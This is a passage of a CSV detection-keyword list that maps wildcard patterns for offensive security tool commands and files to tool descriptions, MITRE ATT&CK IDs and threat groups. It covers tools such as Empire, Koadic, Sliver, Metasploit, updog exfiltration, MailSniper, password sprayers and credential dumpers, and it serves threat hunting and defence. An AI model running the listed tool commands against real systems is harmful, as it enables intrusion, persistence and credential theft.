Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*updog --*,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,0,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*updog -d /*,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. 
It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,0,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*updog -p *,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,0,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*updog-master.zip*,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,1,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*upload-dll * *.dll*,offensive_tool_keyword,dcomhijack,Lateral Movement Using DCOM and DLL Hijacking,T1021 - T1021.003 - T1574 - T1574.007 - T1574.002,TA0008 - TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/WKL-Sec/dcomhijack,1,0,N/A,10,3,228,23,2023-06-18T20:34:03Z,2023-06-17T20:23:24Z -*UploadFileImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*UrbanBishop.exe*,offensive_tool_keyword,Sharp-Suite,C# offensive tools,T1027 - T1059.001 - T1562.001 - T1136.001,TA0004 - TA0005 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*ursnif_IcedID.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*USBPcap*,offensive_tool_keyword,usbpcap,USB capture 
for Windows.,T1115 - T1129 - T1052,TA0003 - TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/s-h-3-l-l/katoolin3,1,0,N/A,N/A,4,315,103,2020-08-05T17:21:00Z,2019-09-05T13:14:46Z -*use exploit/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*use implant/*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*use incognito*,offensive_tool_keyword,AD exploitation cheat sheet,Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*use powershell_stageless*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*use safetykatz*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. 
multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*use stager/*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*UseBeaconCmd*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*uselistener dbx*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - 
Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*uselistener onedrive*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*usemodule persistence/*,offensive_tool_keyword,empire,Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*usemodule powershell/persistence*,offensive_tool_keyword,empire,Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*usemodule privesc/*,offensive_tool_keyword,empire,Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*useplugin csharpserver*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - 
T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*UsePrtAdminAccount*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*UsePrtImperonsationAccount*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*user Inveigh*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*--user orbitaldump*,offensive_tool_keyword,orbitaldump,A simple multi-threaded distributed SSH brute-forcing tool written in Python.,T1110,TA0006,N/A,N/A,Exploitation tools,https://github.com/k4yt3x/orbitaldump,1,0,N/A,N/A,5,440,86,2022-10-30T23:40:57Z,2021-06-06T17:48:19Z -*user_eq_pass_valid_cme_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation 
Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*--user_file*--password_file*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,1,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -*user_password.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*user_to_secretsdump.py*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,0,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -*user|username|login|pass|password|pw|credentials*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*UserEnum*,offensive_tool_keyword,UserEnum,The three scripts provided here allow one to establish if a user exist on a Windows domain. without providing any authentication. These user enumeration scripts use the DsrGetDcNameEx2.CLDAP ping and NetBIOS MailSlot ping methods respectively to establish if any of the usernames in a provided text file exist on a remote domain controller.,T1210.001 - T1213 - T1071.001,TA0007 - TA0002 - TA0003,N/A,N/A,Information Gathering,https://github.com/sensepost/UserEnum,1,1,N/A,N/A,3,209,45,2018-06-03T19:08:37Z,2018-05-21T16:55:58Z -*UserHunterImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*username-anarchy *,offensive_tool_keyword,username-anarchy,Tools for generating usernames when penetration testing. Usernames are half the password brute force problem.,T1110 - T1134 - T1078,TA0006,N/A,N/A,Credential Access,https://github.com/urbanadventurer/username-anarchy,1,0,N/A,N/A,6,564,113,2022-01-26T18:34:02Z,2012-11-07T05:35:10Z -*UsernameAsPasswordCreds.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*userpass_cme_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*userpass_kerbrute_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*UserPassBruteForce*,offensive_tool_keyword,ruler,A 
tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*users/public/troubleshooting_log.log*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,0,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*users\\public\\elevationstation.js*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*users\\usethis\\NewFile.txt*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*users\public\example.bin*,offensive_tool_keyword,forkatz,credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege,T1003.002 - T1558.002 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/Barbarisch/forkatz,1,0,N/A,10,2,122,15,2021-05-22T00:23:04Z,2021-05-21T18:42:22Z -*users\public\temp.bin*,offensive_tool_keyword,forkatz,credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege,T1003.002 - T1558.002 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/Barbarisch/forkatz,1,0,N/A,10,2,122,15,2021-05-22T00:23:04Z,2021-05-21T18:42:22Z -*users_asreproast.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - 
